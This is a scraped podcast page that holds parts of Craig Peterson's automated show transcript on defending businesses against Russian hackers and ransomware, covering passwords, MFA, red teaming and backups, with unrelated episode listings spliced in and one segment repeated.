[00:51:50] What are you going to do when they come for you? What are you going to do?
[00:51:55] Now we're going to talk about prevention. What can you do in order to stop some of these attacks that are coming from Russia and from other countries? It is huge, people. Believe me, this is a very big problem. And I'm here to help.
[00:52:12] We've reviewed a number of things that are important when it comes to your cyber security and your protection.
[00:52:20] We talked about the front end. We talked about the backend. Now we're going to talk about pure prevention, and if you're watching online, you'll be able to see my slides as they come up as we talk about some of this stuff, and you'll find me on YouTube and you'll also find me on Rumble, a fairly new platform out there, a platform that doesn't censor you for the things you say.
[00:52:44] Okay. So here we go. First of all, enabling your Active Directory password protection is going to force password protection all the way through your business. Now I've had some discussions with people over the months, over the years, about this whole thing and what should be done, what can be done, what cannot be done.
[00:53:09] Hey, it's a very big deal when it comes to password protection, and Active Directory, believe it or not, even though it's a Microsoft product, is pretty darn good at a few things. One of them is controlling all the machines and the devices. One of the things we do is we use an MDM, or what used to be called a mobile device manager, called MaaS 360.
[00:53:34] It's available from IBM.
We have a special version of that that allows us, as a managed security services provider, to be able to control everything on people's machines. Active Directory is something you should seriously consider. If you are a Mac based shop, like I am, in fact I'm sitting right now in front of two Macs that I'm using right now, you'll find that Active Directory is a little bit iffy.
[00:54:04] Sometimes for Macs there are some workarounds, and it's gotten better. MaaS 360 is absolutely the way to go, but make sure you've got really good passwords, and the types of passwords that are most prone to spraying attacks are the ones you should be banning specifically. Remember the website Have I Been Pwned?
[00:54:28] Yeah. It's something that you should go to pretty frequently. And again, if you miss anything today, just email me, me@craigpeterson.com. Believe me, I am not going to harass you at all. Okay. Now, the next thing that you should be doing is what's called red team blue team. Now the red team is a group of people, usually outside of your organization.
[00:54:54] If you're a big company they're probably inside, but the red team is the team that attacks you. They're white hat hackers who are attacking you, looking for vulnerabilities, looking for things that you should or shouldn't be doing. And then the blue team is the side that's trying to defend. So think of, like, WarGames.
[00:55:12] Remember that movie with Matthew Broderick all of those decades ago, and how he was trying to defend that computer, was trying to defend, and it moved into an attack mode, right? Red team's attack, blue team is defend. So you want to conduct simulated attacks. Now, conducting these attacks includes saying, oh my, let's now put in place and execute our plan here for what are we going to do once we have a breach.
[00:55:44] And you darn well better have a breach plan in place. So that's one of the things that we help with as a fractional chief information security officer for companies, right?
You've got to get that in place, and you have to conduct these simulated attacks, and you have to do penetration testing, including password spraying attacks.
[00:56:04] There's so many things you can do. One of the things that we like to do, and that you might want to do, whether you're a home user, retiree or a business, is go and look online. You can just use Google. I use far more advanced tools, but you can use Google and look for your email address right there.
[00:56:23] Look for the names of people inside your organization. And then say, wait a minute, does that data actually need to be there? Or am I really exposing the company, exposing people's information that shouldn't be out there? Because you remember the hackers, one of the things they do is they phish you, phish as in pH.
[00:56:47] So they'll send you an email that looks like, hey, let me see. I know that Mary is the CFO, and I know that Joe's going to be out of town for two weeks in The Bahamas, not in touch. So while he's gone, I'm going to send an email to Mary to get her to do something, to transfer the company's funds to me.
[00:57:06] Okay. So that's what that's all about. You've got to make sure, where is our information? And if you go to my company's page, mainstream.net, you'll see on there that I don't list any of the officers or any of the people that are in the company, because that again is a security problem.
[00:57:24] We're letting them know. I go to some of these sites, like professional sites, lawyers, doctors, accountants, and I find right there all of their people, right there, top people or sometimes all of them. And then they'll say, yeah, I went to McGill University, went to Harvard, whatever, my bio. It's all there. So now they've got great information to phish you, to phish that company, because all they have to do is send an email to say, hey, you remember me?
[00:57:56] We were in Harvard, in this class together. And did you have … as a professor? See how that works? Okay.
You also want to make sure that you implement what's called a passwordless user agent, and this is just so wholly effective. If they cannot get into your account, what could possibly go wrong? But one of the ways to not allow them into the account is to use biometrics.
[00:58:24] We use something called Duo, and we have that tied into the single sign-on, and the Duo single sign-on works great, because what it does now is, I go to a site, I put in my username, and it pulls up a special splash page that is running on one of our servers that again asks me for my Duo username.
[00:58:48] So I've got my username for the site, then my Duo username and my Duo password, single sign-on. And then it sends me, to an app on my smart device, a request saying, hey, are you trying to log into Microsoft, or whatever it might be, and you can say yes or no, and it uses biometrics.
[00:59:11] So those biometrics now are great because it says, oh, okay, I need a Face ID or I need a thumbprint, whatever it might be, that allows a generalized passwordless access. Okay. Passwordless, meaning no password. So those are some of the top things you can do when it comes to prevention. And if you use those, they're never going to be able to get at your data, because it's something you have along with something you know. It works great.
[00:59:45] And we like to do this. Some customers don't like to go through those hoops of the single sign-on and using Duo and making that all work right, where we're fine with it. We've got to keep ourselves at least as secure as the DOD regulations require, unlike almost anybody else in industry. I'm not going to brag about it.
[01:00:09] But some of our clients don't like to meet the tightest of controls, and so sometimes they don't. I hate to say that, but they just don't, and it's a fine line between getting your work done and being secure, but I think there's some compromises that can be readily made.
We're going to talk next about saving your data from ransomware, and the newest ransomware.
[01:00:36] We're going to talk about the third generation that's out there right now. Ransomware, it's getting crazy, let me tell ya, and what it's doing to us and what you can do. What is a good backup? That has changed over the last 12 months. It's changed a lot. I used to preach 3, 2, 1. There's a new sheriff in town.
[01:00:58] Stick around. craigpeterson.com.
[01:01:02] 3, 2, 1, that used to be the standard, the gold standard for backing up. It is no longer the case, with now the third generation of ransomware. You should be doing something even better, and we'll talk about it now.
[01:01:19] We're doing this as a simulcast here. It's on YouTube. It is also on Rumble.
[01:01:27] It's on my website at craigpeterson.com, because we're going through the things that you can do, particularly if you're a business, to stop the Russian invasion, because as we've been warned again and again, the Russians are after us and our data. So if you missed part of what we're talking about today, or
[01:01:50] last week's show, make sure you send me an email, me@craigpeterson.com. This is the information you need if you are responsible in any way for computers. That means in your home, right? Certainly in businesses, because what I'm trying to do is help and save those small businesses that just can't afford to have full-time,
[01:02:15] true cyber security personnel on site. So that's what the whole fractional chief information security officer thing is about, because you just, you can't possibly afford it. And believe me, that guy that comes in to fix your computers is no cyber security expert. These people that are attacking us are full time cybersecurity experts, and they're coming from every country in the world, including coming from the US.
[01:02:44] We just had more arrests last week. So let's talk about ransomware correctly. Ransomware, very big problem. Been around a long time.
The first version of ransomware was software that got onto your computer through some mechanism, and then you had that red screen. We've all seen that red screen, and it says, hey, pay up, buddy.
[01:03:07] It says here you need to send so many Bitcoin, or a fraction of a Bitcoin, or so many dollars worth of Bitcoin, to this Bitcoin wallet. And if you need any help, you can send email here or do a live chat. They're very sophisticated. We should talk about it some more at some point. That was generation one.
[01:03:29] Generation two was, not everybody was paying the ransoms. So what did they do at that point? They said, let me see if we can ransom the data by encrypting it and having them pay us to get it back. 50% of the time you got all your data back. Okay. Not very often. Not often enough, that's for sure.
[01:03:49] Or what we could do is, let's steal some of their intellectual property. Let's steal some of their data, their social security numbers, their bank account numbers, et cetera. They're in an Excel spreadsheet on their company. And then, if they don't pay that first ransom, we'll tell them if they don't pay up, we'll release their information.
[01:04:10] Sometimes you'll pay that first ransom and then they will hold you ransom a second time, pretending to be a different group of cyber terrorists. Okay. Number three, round three, is what we're seeing right now. And this is what's coming from Russia, near as everything we can tell. And that is, they are erasing our machines.
[01:04:31] Totally erasing them, in pretty sophisticated ways of erasing it as well, so that it sinks in, really, it's impossible to recover. It's sophisticated in that it doesn't delete some key registry entries until right at the very end and then reboots the computer. And of course, there's no computer left to reboot, right?
[01:04:55] It's lost everything off of that hard drive or SSD, whatever your boot device is.
So let's talk about the best ways here to do some of this backup and saving your data from ransomware. Now you need to use offsite, disconnected backups, no question about it. So let's talk about what's been happening.
[01:05:17] Hospitals, businesses, police departments, schools, they've all been hit, right? And these ransomware attacks are usually started by a person, a link in an email. Now this is a poison link. Most of the time, it used to be a little bit more where it was a Word document, an Excel document that had something nasty inside. Microsoft, as I've said many times, has truly pulled up their socks.
[01:05:45] Okay. So it doesn't happen as much as it used to. Plus with malware defender turned on in your Windows operating system, you're going to be a little bit safer. Next step, a program tries to run. Okay. And it effectively denies access to all of that data, because it's encrypted it. And then usually what it does, so that your computer still works,
[01:06:09] is it encrypts all of your, like, your Word docs, your Excel docs, your databases, right? All the stuff that matters. And once they've got all of that encrypted, you can't really access it. Yeah, the file's there, but it looks like trash now. There's new disturbing trends that have really developed over the last few months.
[01:06:31] So in addition to encrypting your PC, it can now encrypt an entire network and all mounted drives, even drives that are mirroring cloud services. Remember this, everybody, this is really a big deal, because what will happen here is, if you have, let's say you've got an old drive or G drive or some drive mounted off of your network,
[01:06:57] you have access to it from your computer, right? Yeah. You click on that drive, and now you're in there. And on the Windows side, Unix and Macs are a little different, but the same general idea, you have access to it, you have write access to it.
So what they'll do is, any mounted drive, like those network drives, is going to get encrypted, but the same thing is true
[01:07:20] if you are attaching a USB drive to your computer. So that USB drive now, that has your backup on it, gets encrypted. So if your network is being used to back up, and if you have a thumb drive, a USB drive, it's not really a thumb drive, right, it's an external drive, but connected by USB, hooked up,
[01:07:45] and that's where your backup lives? You're... because you have lost it. And there have been some pieces of software that have done that for a while. Yeah. When they can encrypt your network drive, it is really going after a whole bunch of people, because everyone that's using that network drive is now affected, and it is absolutely
[01:08:10] devastating. So the best way to do this is, obviously you do a bit of a local backup. We will usually put a server at the client's site that is used as a backup destination. Okay. So that server's the destination, all of the stuff gets backed up there. It's encrypted. It's not on the network per se. It's using a special encrypted protocol between each machine and the backup server. And then that backup server's data gets pushed off site. Some of our clients, we even go so far as to push it to a tape drive, which is really important too, because now you have something physical that is, by the way, encrypted, that cannot be accessed by the attacker.
[01:09:03] It's offsite. So we have our own data center. We run it, we manage it, no one else has access to it, it is ours. And we push all of those backups offsite to our data center, which gives us another advantage. If a machine crashes badly, right, the hard disk fails, heaven forbid they get ransomware, we've never had that happen to one of our clients,
[01:09:29] just we've had it happen prior to them becoming clients, is that we can now restore
that machine, either virtually in the cloud, or we can restore it right onto a piece of hardware and have them up and running in four hours. It can really be that fast, but it's obviously more expensive than some
[01:09:51] are looking to pay. All right, stick around. We've got more to talk about when we come back. And what are the Russians doing? How can you protect your small business? If you're a one man, one woman operation, believe it, you've got to do this as well, or you could lose everything. In fact, I think our small guys have even more to lose. craigpeterson.com.
[01:10:16] Backups are important. And we're going to talk about the different types of backups right now, what you should be doing, whether you're a one person little business or you are a multi-national. Obviously scale matters.
[01:10:32] Protecting your data is one of the most important things you can possibly do.
[01:10:36] I have clients who had their entire operating account emptied out, completely emptied. It's just amazing. I've had people pay a lot of money to hackers to try and get data back. And I go back to this one lady over in Eastern Europe who built a company out of $45 million by herself. And of course you probably heard about the Shark Tank people, right?
[01:11:07] Barbara Corcoran, how she almost lost $400,000 to a hacker. In fact, the money was on its way when she noticed what was going on and was able to stop it. So thank goodness she was able to stop it. But she was aware of these problems, was looking for the potential, and was able to catch it. How many of us are paying that much attention?
[01:11:34] And now, one of the things you can do that will usually kind of protect you from some of the worst outcomes when it comes to ransomware is to back up. And I know everybody says, yeah, I'm backing up. It's really rare, when we go in, that we find a company has been backing up properly. It even happens to us sometimes.
[01:11:59] We put the backup regimen in place and things seem to be going well, but then when you need the backup, oh my gosh. We just had this happen a couple of weeks ago. Actually this last week, this is what happened. We have something called an FMC, which is a controller from Cisco that actually controls firewalls in our customers' locations.
[01:12:26] This is a big machine. It monitors stuff. It's tied into this ISE server, which is looking for nastiness and where bad guys are trying to break in, right? It's intrusion detection and prevention, and tying it into this massive network of a billion data points a day that Cisco manages. Okay. It's absolutely huge.
[01:12:48] And we're running it in a virtual machine network. So we have two big blade chassis full of blades, and each blade is a computer. So it has multiple CPUs and has a whole bunch of memory. It also has storage in there, and we're using something that VMware calls vSAN. So it's a little virtual storage area network
[01:13:15] that's located inside this chassis, and there are multiple copies of everything. So if a storage unit fails, you're still okay. Everything stays up, it keeps running. And we have it set up so that there's redundancy upon redundancy. One of the redundancies was to back it up to a file server that we have that's running ZFS, which is phenomenal.
[01:13:40] Let me tell you, it is the best file system out there. I've never ever had a problem with it. It's just crazy. I can send you more information if you're ever interested, just email me@craigpeterson.com, anytime. Be glad to send you the open source information, whatever you need. But what had happened is,
[01:13:57] somehow the boot disk of that FMC, that firewall controller, had been corrupted. So we thought, oh, okay, no problem. Let's look at our backups. Yeah, hadn't backed up since October 2019. Yeah, and we didn't know. It had been silently failing.
Obviously we're putting stuff in place to stop that from ever happening again.
[01:14:27] So we are monitoring the backups. That network of disks that was making up that storage area network, that had the redundancy, failed because the machine itself somehow corrupted its file system, ext4 file system, right, and they aren't supposed to be corruptible, but the journal was messed up, and it was, man, what a headache.
[01:14:51] And so they thought, okay, you're going to have to reinstall. And we were sitting there saying, oh, you're kidding me. Reinstalling this FMC controller means we've got to configure our clients' firewalls that are being controlled from this FMC, all of their networks, all of their devices. We had to put it out.
[01:15:07] This is going to take a couple of weeks. So, because I've been doing this for so long, I was able to boot up an optics disk and mount the file system and go in manually underneath the whole FMC, this whole firewall controller, and make repairs to it. Got it repaired, and then got it back online. So thank goodness for that.
[01:15:33] It happens to the best of us, but I have to say I have never had a new client where they had good backups. Ever. Okay. And now that should tell you something. So if you are a business, a small business, whatever it might be, check your backups, double check them. Now, when we're running backups, we do a couple of things.
[01:15:57] We go ahead and make sure the backup is good. So remember I mentioned that we h

MSP 1337
Configure and Implement Securely

MSP 1337

Play Episode Listen Later May 11, 2022 38:11


What should we talk about this week? I have been back and forth with topics recently that involve getting started with cybersecurity and have moved into vendor management and other areas of focus that all revolve around one key theme... reducing risks and protecting ourselves and our clients. Join me as I discuss with Charles Love of Showtech Solutions the configuration and implementation of products and services. Where does the responsibility of the vendor stop and where do MSP responsibilities kick in? What is an appropriately secured implementation of O365, or really any product or service that your clients need and you have been tasked with implementing and managing? We don't go down any rabbit holes on this one!

The Huddle: Conversations with the Diabetes Care Team
The Value of the DCES: Introducing the Value Toolkit

The Huddle: Conversations with the Diabetes Care Team

Play Episode Listen Later Apr 28, 2022 24:46


Resources
Learn more about the Value Toolkit: diabeteseducator.org/value
Read the Value Toolkit Paper: https://doi.org/10.2337/cd21-0089
Read about the Identify, Configure, Collaborate Framework: Identify, Configure, Collaborate: A New Framework for Technology-Enabled Care (diabeteseducator.org)

CPQ Podcast
CPQ Job & Event Cast - Sr. Account Executive

CPQ Podcast

Play Episode Listen Later Apr 28, 2022 1:36


Looking for a remote sales position in the US. Willing to travel 50%. Send email to Frank.Sohn@NovusCPQ.com if you want to get in contact with that person.

CPQ Podcast
Interview with Matthias Schwuchow & Kay Giertzuch from Orisa Software

CPQ Podcast

Play Episode Listen Later Apr 24, 2022 31:35


In this episode you hear from Matthias Schwuchow (CEO) and Kay Giertzuch (Head of Sales) from Orisa Software. Their company is headquartered in Jena, Germany and has around 60 employees. Here they talk about their solution CREALIS CPQ and the top three requirements they see from their customers; you hear why their customers want an offline capability, what their customers think of AI/ML and data analytics, and much more.
Orisa CPQ Day: www.orisa.de/en/cpq-day
Website: www.orisa.de

Pcontrol Podcast
How to Send a Link by E-mail Without Ending Up in Spam? Pcontrol Podcast #226

Pcontrol Podcast

Play Episode Listen Later Apr 13, 2022 5:28


Unfortunately, many messages never even reach users and end up as spam. To avoid this, there are some ways to make sure your e-mail does not land in spam and you reach your target. With that in mind, we offer seven tips to help you configure your e-mails for more efficient delivery and keep them out of potential customers' spam folders. Here are some of them:
Build your own lead base
Use a suitable tool for sending e-mails
Provide an unsubscribe option
Send at an appropriate frequency
Configure the tool's DKIM and SPF
Avoid sending inappropriate content
Avoid buying e-mail lists
Marketing professionals need to be careful when running their marketing campaigns and need to know how to ensure that e-mails don't end up in spam. So invest in these strategies. You will see that e-mails get positive results and stop landing in spam. More importantly, from a vendor's perspective, the company becomes more trustworthy and ethical.

Changing Channels with Larry Walsh
Hitachi Vantara's Kim King on Automated Partner Quoting

Changing Channels with Larry Walsh

Play Episode Listen Later Apr 5, 2022 33:17


Larry Walsh talks to Hitachi Vantara Senior Vice President of Strategic Partners and Alliances Kim King on automating quoting for partners to ensure fast, easy access to accurate pricing with minimal human interaction. Buyer expectations have evolved. No longer are companies willing to wait for weeks for quotes on their IT projects. They want the same “Amazon Experience” in their business purchasing that they get in their consumer lives. In other words, they want quotes in days, if not hours. Quoting has been a longtime challenge for both vendors and distributors. Partners receive different discounts and incentives based on their status, sales performance and history, and competencies. Adding to the complexity is the impact of regional pricing differences, the varying needs of customers for different types of products, and the cost of distribution and fulfillment. Configure, price, and quote (CPQ) solutions go a long way toward automating many steps in the process. Through such systems, partners (in theory) gain access to product pricing and quoting based on customer specifications and fulfillment needs. CPQ works well, but to a point. These systems often lack the ability to take into account the nuances of incentives and other financial measures that influence partner buying. As a result, gaps remain that keep the quoting process running long. Storage vendor Hitachi Vantara decided to tackle this problem directly. Rather than adopting a CPQ system, the company formed a “tiger team” to develop a homegrown system based on Salesforce's CRM. The team set out with the goal of creating a platform capable of processing partner quote requests within hours – even for large enterprise deals. Moreover, the system would include all partner incentives, including deal registration and promotional discounts, in the quotes. 
The development took two years of work that included platform customization and the collection of volumes of pricing, discounting, promotional, and partner data. The effort, thus far, is paying off. The Hitachi Vantara partner quoting system is delivering enterprise-level quotes to partners, often in just hours. The tool, which gives partners a competitive advantage by turning around accurate prices with blazing speed, also gives partners more control over pricing, as they're able to add their own markups with greater ease and consistency. The Hitachi Vantara quoting system isn't perfect and remains a work in progress, but the company is demonstrating how vendors can create better quoting systems that improve partner experience and performance. In this edition of Channelnomics' Changing Channels, Kim King, senior vice president of strategic partners and alliances at Hitachi Vantara, joins host Larry Walsh to discuss how the company developed such a complex quoting system and extracted the benefits they sought.
Follow us, Like us, and Subscribe!
Channelnomics: https://channelnomics.com/
LinkedIn: https://bit.ly/2NC6Vli
Twitter: https://twitter.com/Channelnomics
Changing Channels Is a Channelnomics Production. Follow @Channelnomics to stay current on the latest #research, #bestpractices, and #resources. At @Channelnomics – the voice of thought leadership – we define #channel trends, chart new #GTM strategies, and #partner with industry leaders to champion #diversity in the channel.
Episode Resources
Host Larry Walsh: https://bit.ly/3beZfOa
Guest Kim King: https://www.linkedin.com/in/kimberly-king-746463/

High Intensity Business
357 - How to use Systems to Produce Consistent Workout Quality at Scale

High Intensity Business

Play Episode Listen Later Mar 30, 2022 29:14


If you're having problems with workout quality, client retention, or trainer retention, you might also have a process problem. In this episode, I provide the steps on how to create a workout process for your strength training business. We'll delve into the benefits of creating checklists, how to facilitate iteration, process implementation, and much more.
Get all the processes you need for your strength training studio
Optima Strength's Workout Process:
- Greet the client by name. Shake hand/fist or elbow bump.
- Comfort/prep client: Offer hand sanitizer. Explain mask is optional. How is your body feeling today? Modify the program if required.
- Deliver weekly teaching focus.
- Deliver weekly promotional focus.
- Retrieve workout card and deliver workout: Brief workout overview.
- Setup exercise: Configure settings. Describe how the client should enter exercise safely.
- Provide pre-exercise instruction: What is the exercise? Targeted musculature? Cadence? Goal (aim for X reps or to reach failure in target rep range e.g. 6-8, 8-12).
- Help the client make progress in resistance and/or reps (do not record advanced techniques).
- Provide enthusiastic encouragement and specific, positive and corrective feedback throughout each set.
- Get the client to or as close to MMF in good form as possible. If form is very poor, stop exercise, give corrective feedback, and consider modifying the exercise.
- Use advanced overload techniques (AOTs) during the workout, but always strive to get the client to MMF in their first set.
- The client MUST feel that you want them to get results more than they do (this is the most critical part of the entire process).
- Record performance and any important notes on the workout card.
- Always finish on time. Always try to complete the workout, but never at the expense of the next client's time slot.
- Provide honest positive and constructive feedback.
- Thank the client for coming in for their workout.
- Wipe down machines.
This podcast episode is brought to you by ARX Do you struggle to attract and retain clients in your strength training studio? ARX machines use breakthrough motorized resistance and computer software to give your clients the perfect workout every time, so you can start to deliver great workouts and grow your business with confidence. Get $500 OFF by going to ARXFit.com/HIB and booking a call with the ARX sales team – Book Here For all of the show notes, links and resources - Click Here

Craig Peterson's Tech Talk
Which Anti-Hacker Techniques Can You Use Against the Russian Hackers?

Craig Peterson's Tech Talk

Play Episode Listen Later Mar 26, 2022 84:29


Weekly Show #1158
We know the Russians have been attacking us. I've talked a lot about it on the radio and TV over the last couple of weeks. So I am doing something special; we are going through the things you can do to stay safe from the latest Russian attacks. Last week, we started doing something I promised we would continue -- how can you protect yourself when it comes to the Russians? The Russians are the bad guys when it comes to bad guys. So there are a few things you can do. And there are a few things, frankly, you shouldn't be doing. And that's precisely what we're going to talk about right now. Today, I explain:
- How to protect your back-end
- Preventative measures
- The new rules of backing up your computer
As usual, we'll cover the What, Why, and How's.
[Automated transcript follows]
[00:00:39] So last week we went over some steps, some things that you can look at, that you should look at, that are going to help protect you. And we are going to go into this a whole lot more today. And so I want you to stick around, and if you miss anything, you can go online. You can go to craigpeterson.com; make sure you sign up there for my email.
[00:01:01] And what I'm going to do for you is send you a few different documents, now, where we can chat back and forth about it, but I can send you this. Now I'm recording this on video as well as on audio, so you can follow along if you're watching either on YouTube or over on Rumble, and you can find it also on my website.
[00:01:26] I've been trying to post it up there too, but right now let's talk about what we call passive backend protections. So you've got the front end, and the front end, of course, is stuff coming at you, maybe to the firewall. I've mentioned last week about customers of mine. I was just looking at a few customers this week, just so I could have an idea of their firewalls.
[00:01:52] And they were getting about 10 attacks per minute. Yeah.
And these were customers who have requirements from the Department of Defense because they are defense subcontractors. So again, potential bad guys. So I looked up their IP addresses and where the attacks were coming from. Now, remember, that doesn't mean where they originated, because the bad guys can hop through multiple machines and then get onto your machine. [00:02:22] What it means is that, ultimately, they ended up coming from one machine, right? So there's an IP address of that machine that's attacking my clients or attacking my machines. That just happens all the time. A lot of scans, but some definite attacks where they're trying to log in using SSH. [00:02:42] And what I found is these were coming from Slovakia, Russia, and Iran. Kind of what you were expecting, right? The Iranians, they just haven't given up yet. They keep trying to attack, particularly our military and our industry. One of the things we found out this week from, again, this was an FBI notice, is that the Russians have been going after our industrial base. [00:03:09] And that includes, in fact, it's more specifically, our automobile manufacturers. We've already got problems, right? Try buying a new car, try buying parts. I was with my friend just this week. I helped him because he had his car, right, needing to get picked up. So I took him over to pick up his car and we chatted a little bit with this small independent automotive repair shop. [00:03:34] And they were telling us that they're getting sometimes six- to eight-week delays on getting parts, and some parts they just can't get. So they're going to everything from junkyards on out, and the worst parts are the official parts from the car manufacturers. So what's been happening is Russia apparently has been hacking into these various automobile manufacturers and automobile parts manufacturers. [00:04:03] And once they're inside, they've been putting in a remote-control botnet.
And those botnets now have the ability to wake up when they want them to wake up. And then once they've woken up, what do they do? Who knows? They've been busy erasing machines, causing nothing but havoc; they've been doing all kinds of stuff in the past. Today, they're sitting there. [00:04:24] Which makes you think they're waiting: accumulate as much as you possibly can, and then once you've got it all accumulated, go ahead and attack. So they could control thousands of machines, but it's not just in the U.S.; it's automobile manufacturers in Japan that we found out about. [00:04:44] So that's what they're doing right now. So you've got kind of that front-end and back-end protection. So we're going to talk a little bit about the back end. What does that mean when a cybersecurity guy talks about the back end and the protections? I've got it up on my screen right now, but here are the things you can do. [00:05:03] Okay. Remember, small businesses are just getting nailed by these guys because, again, they're fairly easy targets. One: change your passwords, right? How many times do we have to say that? And yet about 70% of businesses out there are not using a good password methodology. If you want more information on passwords, two-factor authentication, you name it, [00:05:30] just email me, me@craigpeterson.com. I want to get the information out now. You've got to make sure that all of the passwords on your systems are encrypted, are stored in some sort of a good password vault. You really should be looking at 256-bit encryption or better. I have a vendor that I use. So if you get my emails every week, with them there's a little training. [00:05:59] And so I'll give you a five-minute training. It's written; usually it's in bullet-point form. I'm just trying to help you understand things. That provider of mine has a big database, and there's another provider that I use that is for training. So the training guys use the database of my provider.
[00:06:20] In using that database, they're storing the passwords, and the training provider is putting passwords in the clear into the database, which is absolutely crazy. So again, if you're a business, if you're storing any sort of personal information, particularly passwords, make sure that you're using good encryption, and you're, what's called, salting the hash, which means [00:06:46] you're not really storing the password, just storing a salted hash. I can send you more on this if you are a business and you're developing software; this is long-tail stuff here. Configure all of the security password settings so that if someone's trying to log in and is failing, you block it. Many of us, let's say you're a small business, [00:07:08] I see this all of the time. Okay, you're not to blame, but you have a firewall that came from the cable company. Maybe you bought it at a big-box retailer. Maybe you bought it online over at Amazon. Is it really great for you? Has it got settings on there that let you say, if there are 20 attempts to log in, [00:07:31] maybe we should stop them? Now, what we do personally for our customers is typically we'll block them at somewhere around three or four failed attempts, and then their password's blocked. Now, you can configure that sort of thing if you're using email. And that's an important thing to do, let me tell you, because we've had some huge breaches due to email, like Microsoft email and passwords, and people logging in and stealing stuff. [00:07:59] It was just a total nightmare for the entire industry last year. But limit the number of login retries as well while you're in there. These excessive login attempts, or whatever you want to define it as, need to lock the account. And what that means is even if they have the right password, they can't get in, and you have to use an administrative password in order to get in. [00:08:25] You also want to, what's called, throttle the rate of repeated logins.
Now, you might've gotten caught on this, right? You went to your bank, you went to eBay, you went to any of these places, and all of a sudden it denied you, right? It blocked you. That can happen when your account is on these hackers' lists. [00:08:45] You remember last week we talked about password spraying. Well, that's a very big deal, and hackers are doing the spraying trick all of the time, and that is causing you to get locked out of your own account. So if you do get locked out, remember it might be because someone's trying to break in. Obviously, you have to enforce the policies. [00:09:09] The CAPTCHA is a very good thing. Again, this is more for software developers. We always recommend that you use multi-factor or two-factor authentication. Okay. Do not use your SMS, your text messages, for that, where they'll send you a text message to verify who you are. If you can avoid that, you're much better off, [00:09:30] because there are some easy ways to get around that for hackers that are determined. Okay, a multi-factor, again. Install an intrusion detection system. We put it right at the network edge and between workstations and servers. Even inside the network, we put detection systems that look for intrusion attempts and block intrusion attempts. [00:09:56] Very important: use denied lists to block known attackers. We build them automatically. We use some of the higher-end Cisco gear. Cisco is a big network provider. They have some of the best hardware and software out there, and you have to subscribe. A lot of people complain: I'm going to just go buy a firewall for 200 bucks on Amazon. [00:10:18] Why would I pay that much a month just to have a Cisco firewall? And it's like paying for the brand. I've got a logo shirt on here. Oh, I wouldn't pay for that. No, it's because they are automatically providing block lists that are updated by the minute sometimes. And then make sure you've got an incident response plan in place.
[00:10:44] What are you going to do when they come for you? What are you going to do, bad boys, bad boys? Stick around. We've got a lot more to talk about here as we go. I am explaining the hacks that are going on right now and what you can do as a business and an individual to protect yourself. Don't go anywhere. [00:11:07] Now we're going to talk about prevention. What can you do in order to stop some of these attacks that are coming from Russia and from other countries? It is huge, people. Believe me, this is a very big problem. And I'm here to help. [00:11:23] Hi, I'm Craig Peterson, your chief information security officer. We've reviewed a number of things that are important when it comes to your cybersecurity and your protection. [00:11:37] We talked about the front end. We talked about the back end. Now we're going to talk about pure prevention, and if you're watching online, you'll be able to see my slides as they come up as we talk about some of this stuff, and you'll find me on YouTube and you'll also find me on Rumble, a fairly new platform out there, a platform that doesn't censor you for the things you say. [00:12:01] Okay. So here we go. First of all, enabling your Active Directory password protection is going to force password protection all the way through your business. Now, I've had some discussions with people over the months, over the years, about this whole thing and what should be done, what can be done, what cannot be done. [00:12:26] Hey, it's a very big deal when it comes to password protection, and Active Directory, believe it or not, even though it's a Microsoft product, is pretty darn good at a few things. One of them is controlling all the machines and the devices. One of the things we do is we use an MDM, or what used to be called a mobile device manager, called MaaS360. [00:12:51] It's available from IBM. We have a special version of that that allows us, as a managed security services provider, to be able to control everything on people's machines.
Active Directory is something you should seriously consider. If you are a Mac-based shop, like I am, in fact, I'm sitting right now in front of two Macs that I'm using right now, you'll find that Active Directory is a little bit iffy [00:13:21] sometimes for Macs. There are some workarounds, and it's gotten better. MaaS360 is absolutely the way to go, but make sure you've got really good passwords, and the types of passwords that are most prone to spraying attacks are the ones you should be banning specifically. Remember the website Have I Been Pwned? [00:13:45] Yeah, it's something that you should go to pretty frequently. And again, if you miss anything today, just email me, me@craigpeterson.com. Believe me, I am not going to harass you at all. Okay. Now, the next thing that you should be doing is what's called red team/blue team. Now, the red team is a group of people, usually outside of your organization. [00:14:11] If you're a big company, they're probably inside, but the red team is the team that attacks you. They're white-hat hackers who are attacking you, looking for vulnerabilities, looking for things that you should or shouldn't be doing. And then the blue team is the side that's trying to defend. So think of, like, WarGames. [00:14:29] Remember that movie with Matthew Broderick all of those decades ago, and how he was trying to defend that computer, and the computer moved into an attack mode, right? Red team's attack, blue team is defend. So you want to conduct simulated attacks. Now, conducting these attacks includes saying, oh my, let's now put in place and execute our plan here for what we are going to do once we have a breach. [00:15:01] And you darn well better have a breach plan in place. So that's one of the things that we help with as a fractional chief information security officer for companies, right?
You've got to get that in place, and you have to conduct these simulated attacks, and you have to do penetration testing, including password spraying attacks. [00:15:21] There are so many things you can do. One of the things that we like to do, and that you might want to do, whether you're a home user, retiree, or a business, is go and look online. You can just use Google. I use far more advanced tools, but you can use Google and look for your email address right there. [00:15:40] Look for the names of people inside your organization. And then say, wait a minute, does that data actually need to be there? Or am I really exposing the company, exposing people's information that shouldn't be out there? Because you remember the hackers, one of the things they do is they phish you, phish as in "ph." [00:16:04] So they'll send you an email that looks like, hey, let me see, I know that Mary is the CFO, and I know that Joe's going to be out of town for two weeks in the Bahamas, not in touch. So while he's gone, I'm going to send an email to Mary to get her to do something, to transfer the company's funds to me. [00:16:23] Okay. So that's what that's all about. You've got to make sure, where is our information? And if you go to my company's page, mainstream.net, you'll see on there that I don't list any of the officers or any of the people that are in the company, because that, again, is a security problem. [00:16:41] We're letting them know. I go to some of these sites, like professional sites, lawyers, doctors, accountants, and I find right there all of their people, or their top people, or sometimes all of them. And then it'll say, yeah, I went to McGill University, went to Harvard, whatever my degree. It's all there. So now they've got great information to phish you, to phish that company, because all they have to do is send an email to say, hey, you remember me? [00:17:13] We were at Harvard in this class together, and didn't you have so-and-so as a professor? See how that works? Okay.
